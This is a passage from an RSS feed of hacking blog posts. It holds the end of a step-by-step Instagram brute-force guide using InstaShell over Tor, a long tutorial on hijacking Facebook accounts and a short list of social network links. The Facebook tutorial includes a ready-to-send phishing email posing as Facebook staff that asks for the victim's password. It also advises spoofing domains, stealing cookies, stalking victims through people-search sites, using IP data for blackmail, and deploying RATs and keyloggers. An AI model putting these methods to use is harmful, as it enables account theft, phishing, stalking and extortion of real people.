  <h3>STEP 2</h3>
  <ul>
    <li>Clone InstaShell Source code from GitHub</li>
    <li>It will download all Source code in your</li>
  </ul>
  <pre>git clone https://github.com/F33Z/instashell.git
</pre>
  <h3>STEP 3</h3>
  <ul>
    <li>It will create new Directory so let&#x27;s open it by typing following command</li>
  </ul>
  <pre>cd instashell/
</pre>
  <h3>STEP 4</h3>
  <ul>
    <li>Change file permission using the following command</li>
    <li>If you don’t change permission it won’t run</li>
  </ul>
  <pre>chmod +x ./instashell.sh
</pre>
  <h3>STEP 5</h3>
  <ul>
    <li>To do attack first it needs to start TOR service</li>
    <li>To start TOR service type following command</li>
  </ul>
  <pre>service tor start
</pre>
  <h3>STEP 6</h3>
  <ul>
    <li>Let’s start Instagram password Brute Force attack</li>
    <li>Type following command</li>
  </ul>
  <pre>./instashell.sh
</pre>
  <h3>STEP 7</h3>
  <ul>
    <li>Now enter victim Username, word list, and set Threads value</li>
    <li>Create a custom password list for the victim using cupp</li>
    <li>Or use default password list</li>
    <li>In default password list it won’t work</li>
    <li>The custom password list can increase chances</li>
  </ul>
  <pre>Username account: itmefeez
Password List: /root/pass.txt
Threads:  500
</pre>
  <h3>STEP 8</h3>
  <ul>
    <li>if you have perfect password list than it will guess password used by a victim</li>
    <li>If the password list is larger than it will need more time passion</li>
  </ul>
  <h3>CONCLUSION</h3>
  <ul>
    <li>It won’t work all the time but having some information of victim can increase the success rate</li>
    <li>Next, we learn how to generate custom password list using CUPP</li>
    <li>Don’t forget to <em>Spread The World</em></li>
  </ul>
  <tt-tags>
    <tt-tag name="ahmedalghaleb">#ahmedalghaleb</tt-tag>
    <tt-tag name="supermaniq">#supermaniq</tt-tag>
  </tt-tags>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@iraqi/HOW-TO-HACK-FACEBOOK-ACCOUNT</guid><link>https://teletype.in/@iraqi/HOW-TO-HACK-FACEBOOK-ACCOUNT?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi</link><comments>https://teletype.in/@iraqi/HOW-TO-HACK-FACEBOOK-ACCOUNT?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi#comments</comments><dc:creator>iraqi</dc:creator><title>HOW TO HACK FACEBOOK ACCOUNTS - NEW METHODS BY ALGHALEB</title><pubDate>Sun, 23 Aug 2020 23:28:34 GMT</pubDate><category>Hacking</category><tt:hashtag>ahmedalghaleb</tt:hashtag><tt:hashtag>supermaniq</tt:hashtag><description><![CDATA[<img src="https://teletype.in/files/03/6c/036c6de5-ad02-4d35-8125-d39272fea104.jpeg"></img>[Another Highly detailed Tutorial] 02-04-2014, 03:43 PM]]></description><content:encoded><![CDATA[
  <blockquote data-align="center"><code>[Another Highly detailed Tutorial] 02-04-2014, 03:43 PM</code></blockquote>
  <h3>I made this tutorial a while back on the deep web but someone posted it on google so I decided to release it to you guys as well! <em>They are doing this for a lot of my tutorials so expect a few more!</em></h3>
  <figure class="m_original" data-caption-align="center">
    <img src="https://teletype.in/files/03/6c/036c6de5-ad02-4d35-8125-d39272fea104.jpeg" width="1200" />
    <figcaption><strong>I WILL GUIDE YOU GUYS STEP BY STEP HOW TO BYPASS FACEBOOK HIGH-SECURITY SYSTEMS </strong></figcaption>
  </figure>
  <p>let&#x27;s start my sweetheart&#x27;s fans,</p>
  <p>Once again I am back to write more on Facebook to include other methods.</p>
  <p>Please don&#x27;t leech my tutorials. I work my ass off putting these tutorials together and I deserve all the credit.</p>
  <p>I have already written 3 tutorials on Facebook, and you should definitely read all of them since I will include some information that has already been mentioned on them.</p>
  <p>Bypassing FB security w/ Pics</p>
  <p><strong>[Tutorial] Why you shouldn&#x27;t phish, keylog, SE on FB.</strong></p>
  <p>How to hack FB [Detailed Tut]</p>
  <p>Updates will be necessary in the future.</p>
  <p>I felt that I merely stated the tools to use on my last tutorial, so on this tutorial I wanted to focus a bit more on how to think through the process like a hacker.</p>
  <p>I don&#x27;t like to spoon-feed the steps since I prefer to allow people to use their brains to think on their own, but I understand that not every person has experience with the computer realms and therefore I must be more detailed on my explanations.</p>
  <p>Let&#x27;s get started.</p>
  <p>I will cover the following information:</p>
  <ul>
    <li>1) Other forms of Hacking Facebook accounts, other than the typical suggestions of RATs, Keyloggers, Phishers, and so on...</li>
    <li>2) Hacking Facebook accounts wirelessly</li>
    <li>3) Footprinting your victim</li>
    <li>4) How you have to think</li>
    <li>5) Spoofing e-mails to the victim (Use direct URL)</li>
    <li>6) Slightly re-touch RATs, keyloggers, Phishers because I have already explained in-dept on my other tutorial.</li>
  </ul>
  <p>Let&#x27;s jump into it.</p>
  <p>1) Other forms of hacking Facebook accounts, other than the typical suggestions of RATs, Keyloggers, Phishers, and so on...</p>
  <p>On my last tutorial on here.<br />How to hack Facebook [Highly detailed Tutorial] - Updated methods Re-UPDATED 1/24/11</p>
  <p>I focused on these subjects.</p>
  <p><strong>1) Key loggers<br />2) Rats<br />3) Phishing (Well, not really.)<br />4) Social Engineering<br />5) How not to get traced<br />6) Regaining Access - New Retrieval method</strong></p>
  <p>But now for this particular on this new tutorial, I would like to mention how to integrate these kinds of malware into better use to be more efficient in your results.</p>
  <p>1. Infected Facebook Applications aka &quot;Drive bys&quot;</p>
  <p>2. Flooding their walls.</p>
  <p>A shout to those two guys for coming up with those tutorials since they appeared to be extremely useful for stealing a Facebook accounts.</p>
  <p>1. How can this particular application be useful?</p>
  <p>To put it simple, what this application does is it allows you to set up something known as a &quot;drive by&quot; within the Facebook applications where someone enters the application and asks them to accept the application to start.</p>
  <p>Once they select Run on the pop up, they can be infected with either a RAT, keylogger, stealer, etc...</p>
  <p>You should go on the thread of Endax&#x27;s for more details on how to set it up.</p>
  <p>This particular approach is useful simply because everything looks very innocent and the target is likely to fall for it with a higher risk than the other typical forms of attacks.</p>
  <p>2. Flooding their walls.</p>
  <p>Now you might imagine that once you have an application that has the potential of infecting your victim, how are you going to convince your target to try out your application?</p>
  <p>It&#x27;s simple, simply name the application based on what your target likes. The customization is mentioned more on Endax&#x27;s thread, so again look into it for more details.</p>
  <p>You can spam the hell out of the walls using T0X1CV1RU5&#x27;s method or you can simply send an innocent message.</p>
  <p>Flooding their walls is also useful if you want to visit a particular website that has the potential of infecting as well.</p>
  <p>If you need drive-bys, you can see use these.</p>
  <p>(Click here to view)</p>
  <p>(Click here to view)</p>
  <p>2) Hacking Facebook accounts wirelessly</p>
  <p>1. Surprisingly, I have not seen a single person here on any other communities suggesting this method and yet it&#x27;s so simple.</p>
  <p>Hacking Facebook accounts through a wireless connection is simple, but unfortunately by &quot;wirelessly&quot; I am referring only if you are under the same wifi or under the same network.</p>
  <p>It will save lots of time explaining, if I use a video that has been made. So, here it is a good video explaining everything.</p>
  <p>Just a side note is to make sure that you get Firefox: 3.6.12</p>
  <p>Be sure to click on the descriptions on that video to see where you can download the tools.</p>
  <p>2. Stealing Cookies</p>
  <p>If you watched the video that I posted above, you undestand how Facebook works by storing cookies on your computer.</p>
  <p>You can also steal cookies through a different form, such as this explained on this tutorial.<br />[TUT] How to steal cookies (Easy)! [/TUT]</p>
  <p>The &quot;cookie&quot; is basically the piece of file that maintains the records that you have done on your account. If you get access to these cookies, you can log in as whoever you want.</p>
  <p>3) Footprinting your victim</p>
  <p>What is Footprinting?</p>
  <p>Basically it&#x27;s collecting information about your target&#x27;s computer and themselves.</p>
  <p>Personally, I like to open a text editor and save any information I can find about them so I do not forget about it if I need use of it in the future.</p>
  <p><a href="http://en.wikipedia.org/wiki/Footprinting" target="_blank">http://en.wikipedia.org/wiki/Footprinting</a></p>
  <p>To put it in the most simplistic language, it&#x27;s stalking your victim for information that you can use in order to gain access.</p>
  <p>Information such as Age, Date of Birth, Place of Birth, Parents names, Sibling names, family names, pet names, e-mail are the most common information that you can possible acquire.</p>
  <p>Websites such as:</p>
  <ul>
    <li><a href="http://com.lullar.com/" target="_blank">http://com.lullar.com/</a></li>
    <li><a href="http://www.pipl.com/email/" target="_blank">http://www.pipl.com/email/</a></li>
    <li><a href="http://www.spokeo.com/" target="_blank">http://www.spokeo.com</a></li>
    <li><a href="http://www.emailfinder.com" target="_blank">http://www.emailfinder.com</a></li>
    <li><a href="http://www.411.com/" target="_blank">http://www.411.com/</a></li>
    <li><a href="http://www.ask.com/" target="_blank">http://www.ask.com/</a></li>
    <li><a href="http://www.bebo.com/" target="_blank">http://www.bebo.com/</a></li>
    <li><a href="http://www.facebook.com/" target="_blank">http://www.facebook.com/</a></li>
    <li><a href="http://www.flickr.com/" target="_blank">http://www.flickr.com/</a></li>
    <li><a href="http://www.ip-adress.com/ipaddresstolocation/" target="_blank">http://www.ip-adress.com/ipaddresstolocation/</a></li>
    <li><a href="http://www.myspace.com/" target="_blank">http://www.myspace.com/</a></li>
    <li><a href="http://www.myyearbook.com/" target="_blank">http://www.myyearbook.com/</a></li>
    <li><a href="http://www.searchenginez.com/findpeople.html" target="_blank">http://www.searchenginez.com/findpeople.html</a></li>
    <li><a href="http://www.skipease.com/" target="_blank">http://www.skipease.com/</a></li>
    <li><a href="http://www.sonico.com/" target="_blank">http://www.sonico.com/</a></li>
    <li><a href="http://www.spock.com/" target="_blank">http://www.spock.com/</a></li>
    <li><a href="http://www.twitter.com/" target="_blank">http://www.twitter.com/</a></li>
    <li><a href="http://www.usatrace.com/" target="_blank">http://www.usatrace.com/</a></li>
    <li><a href="http://www.whitepages.com" target="_blank">http://www.whitepages.com</a></li>
    <li><a href="http://www.whois.com/" target="_blank">http://www.whois.com/</a></li>
    <li><a href="http://www.whois.net/" target="_blank">http://www.whois.net/</a></li>
    <li><a href="http://www.wink.com/" target="_blank">http://www.wink.com/</a></li>
    <li><a href="http://www.youtube.com" target="_blank">http://www.youtube.com</a></li>
    <li><a href="http://www.zabasearch.com/" target="_blank">http://www.zabasearch.com/</a></li>
    <li><a href="http://www.zoominfo.com" target="_blank">http://www.zoominfo.com</a></li>
  </ul>
  <p>Make it extremely easy to search names, e-mails, etc to dig information about whoever you want. There are more websites in which I personally use to dig information about people, but I will not mention them since I do not want the news station going crazy on a new rage of identity exposers.</p>
  <p>Again, I have written tutorials on this subject on how to protect your identity online.</p>
  <p>The tutorial itself can be used to test the information of others as well without their acknowledgement.</p>
  <p>The tutorials are here:<br />How to protect your identity online [Part 1/2] [Extremely DETAILED]<br />How to protect your identity online [Part 2/2][Extremely DETAILED]</p>
  <p>All the information that you are able to collect, save it on a text editor such as notepad and save the information.</p>
  <p>Do you have the IP of the target?</p>
  <p>You can dig more information with the IP adddress. Information that can be very useful, incase if you want to blackmail.</p>
  <p>You can read on the subject more in details on this tutorial of mine.<br />How to track Hackers and attacks Part 1/2 [Super detailed]<br />How to track Hackers and attacks Part 2/2 [Super detailed]</p>
  <p>I covered all the things that you can do with an IP to collect more information regarding your target.</p>
  <p>4) How you have to think</p>
  <p>This is the classic part of every hacking process.</p>
  <p>Any time you want to hack anything, you need the following things:</p>
  <p>1) You need a plan<br />2) You need a strategy<br />3) You need executions<br />4) You need results<br />5) You need to clean up all the evidence</p>
  <p>You need to know how to do Social Engineering like a hacker would. Social engineering itself takes lots of clear thinking and noticing every single detail to the point of perfection.</p>
  <p>I posted an E-book on the subject if you want to learn like a professional.<br />The Art Of Human Hacking</p>
  <p>You can&#x27;t simply lie to someone&#x27;s face online or offline because people aren&#x27;t exactly stupid.</p>
  <p>You have to think exactly what you want to say and how to say it.</p>
  <p>You need to know what your target likes, what your target is likely to fall gullible for, what your target dislikes, what your target wants, what your target hates or love, etc...</p>
  <p>The other most common form is creating a bogus fake profile and adding them through Facebook by posing as an attractive female or male, depending on what gender they are and their sexuality.</p>
  <p>5) Spoofing e-mails to the victim (Use direct URL or Phisher)</p>
  <p>Tut on spoofing</p>
  <p>This is another form of attack that you can take to fool your target into believing that you are Facebook staff.</p>
  <p>Using spoofed e-mails, you can send an e-mail as whoever you want.</p>
  <p>E-mail spoofer</p>
  <p>Get your self a webhosting and upload the file to use it.</p>
  <p><a href="http://www.000webhost.com/" target="_blank">http://www.000webhost.com/</a></p>
  <p>You can use that particular Spoofer that I use. It&#x27;s someone&#x27;s scripting, but I edit it slightly so it doesn&#x27;t go into spam.</p>
  <p>You can send them an e-mail such as this:</p>
  <p>Quote:<br />Hello **,<br />Your account has had multiple login attempts from Sandusky, Ohio, and we want to verify that your account is safe.<br />We will need to verify through a few questions.<br />What is your D.O.B?</p>
  <p>What is your confirmation phone number?</p>
  <p>What is your current password?</p>
  <p>What passwords have you recently changed?</p>
  <p>Thank you for your cooperation.<br />Sincerely,<br />Facebook Staff.</p>
  <p>Again, the spoofed e-mail is using Social Engineering to fool the target. You can customize your fake e-mail message however you want.</p>
  <p>I can sell you a Facebook phisher for $10, send me a PM if anyone is interested.</p>
  <p>That is what you will get for $10, so you can just send them a fake URL using <a href="http://dot.tk/" target="_blank">http://dot.tk</a></p>
  <p>Basically, you will see free hosting from 000webhost and then shorten your URL using <a href="http://dot.tk/" target="_blank">http://dot.tk</a></p>
  <p>To anything you want like, for example:</p>
  <p><a href="http://facebook.tk/" target="_blank">http://facebook.tk</a></p>
  <p>You will receive logs like these.<br />Spoiler (Click to View)</p>
  <p>6) Slightly re-touch RATs, keyloggers, Phishers because I have already explained in dept on my other tutorial. (On other forums (deepweb i will be posting more here soon)</p>
  <h3>1) Keyloggers</h3>
  <p>If you want a keylogger, you can contact me or use google!</p>
  <p>I personally recommend this really good keylogger if you want to spend a bit of extra money with assistance included.</p>
  <p><a href="http://refriedstudios.com/" target="_blank">http://refriedstudios.com/</a></p>
  <p>Buy now, the best keylogger and RAT in the market for a good price with a lot help included!</p>
  <h3>2) RATs</h3>
  <p>I see the same question all the time, Which is the best/favorite RAT?</p>
  <p>-Based on my personal experience, I can say that DarkComet and Cybergate are the best for RATs being free.</p>
  <p>You can find DarkComet here: <a href="http://darkcomet-rat.com/" target="_blank">http://darkcomet-rat.com/</a><br />You can find CyberGate here: <a href="http://website.cybergate-rat.org/mainpage/" target="_blank">http://website.cybergate-rat.org/mainpage/</a></p>
  <p>I will not go into teaching you how to set those up because there are already a ton of tutorials on how to do that.</p>
  <h3>3) Phishers</h3>
  <p>Can&#x27;t go into the conversations of Phishers since it&#x27;s against the rules. If you want to buy the one I offer, send me a PM.</p>
  <p>I want to say that you should definitely without a doubt read my other threads if you want to make any progress taking over any account. I consider this tutorial alone rather vague simply because I have already explained in more details on the other threads. Be sure to scroll up at the very top for the links.</p>
  <tt-tags>
    <tt-tag name="ahmedalghaleb">#ahmedalghaleb</tt-tag>
    <tt-tag name="supermaniq">#supermaniq</tt-tag>
  </tt-tags>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@iraqi/OSINT-PART10</guid><link>https://teletype.in/@iraqi/OSINT-PART10?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi</link><comments>https://teletype.in/@iraqi/OSINT-PART10?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi#comments</comments><dc:creator>iraqi</dc:creator><title>OSINT | MAJOR SOCIAL NETWORKS</title><pubDate>Sat, 22 Aug 2020 14:15:33 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/a0/14/a0146b16-dfa3-488b-ba73-de9769cce41d.png"></media:content><category>OSINT</category><tt:hashtag>ahmedalghaleb</tt:hashtag><tt:hashtag>supermaniq</tt:hashtag><description><![CDATA[<img src="https://teletype.in/files/86/67/86678fa2-70e9-4e33-b4df-bfb1f3e71db5.jpeg"></img> 🕸 Draugiem Latvia
 🕸 Facebook
 🕸 Facenama Iran
 🕸 Google+
 🕸 Instagram
 🕸 Linkedin
 🕸 Mixi Japan
 🕸 Odnoklassniki Russia
 🕸 Pinterest
 🕸 Qzone China
 🕸 Reddit
 🕸 Taringa Latin America
 🕸 Tinder
 🕸 Tumblr
 🕸 Twitter
 🕸 Weibo China
 🕸 VKontakte
 🕸 Xing]]></description><content:encoded><![CDATA[
  <figure class="m_original">
    <img src="https://teletype.in/files/86/67/86678fa2-70e9-4e33-b4df-bfb1f3e71db5.jpeg" width="1243" />
    <figcaption><strong>PART OF THE BIGGEST OSINT RESOURCES BY AHMED ALGHALEB</strong></figcaption>
  </figure>
  <h3>Today my sweetheart&#x27;s fans I will share with you a list of best major social networks.</h3>
  <p><a href="https://www.draugiem.lv" target="_blank"> 🕸 Draugiem Latvia</a><br /> <a href="http://www.facebook.com" target="_blank">🕸 Facebook</a><br /> <a href="http://facenama.com" target="_blank">🕸 Facenama Iran</a><br /> <a href="https://plus.google.com" target="_blank">🕸 Google+</a><br /> <a href="https://www.instagram.com" target="_blank">🕸 Instagram</a><br /> <a href="https://www.linkedin.com" target="_blank">🕸 Linkedin</a><br /> <a href="https://mixi.jp" target="_blank">🕸 Mixi Japan</a><br /> <a href="http://ok.ru" target="_blank">🕸 Odnoklassniki Russia</a><br /> <a href="http://www.pinterest.com" target="_blank">🕸 Pinterest</a><br /> <a href="http://qzone.qq.com" target="_blank">🕸 Qzone China</a><br /> <a href="https://www.reddit.com" target="_blank">🕸 Reddit</a><br /> <a href="http://www.taringa.net" target="_blank">🕸 Taringa Latin America</a><br /> <a href="https://www.gotinder.com" target="_blank">🕸 Tinder</a><br /> <a href="https://www.tumblr.com" target="_blank">🕸 Tumblr</a><br /> <a href="https://twitter.com" target="_blank">🕸 Twitter</a><br /> <a href="http://weibo.com" target="_blank">🕸 Weibo China</a><br /> <a href="https://vk.com" target="_blank">🕸 VKontakte</a><br /> <a href="https://www.xing.com" target="_blank">🕸 Xing</a></p>
  <tt-tags>
    <tt-tag name="ahmedalghaleb">#ahmedalghaleb</tt-tag>
    <tt-tag name="supermaniq">#supermaniq</tt-tag>
  </tt-tags>

]]></content:encoded></item></channel></rss>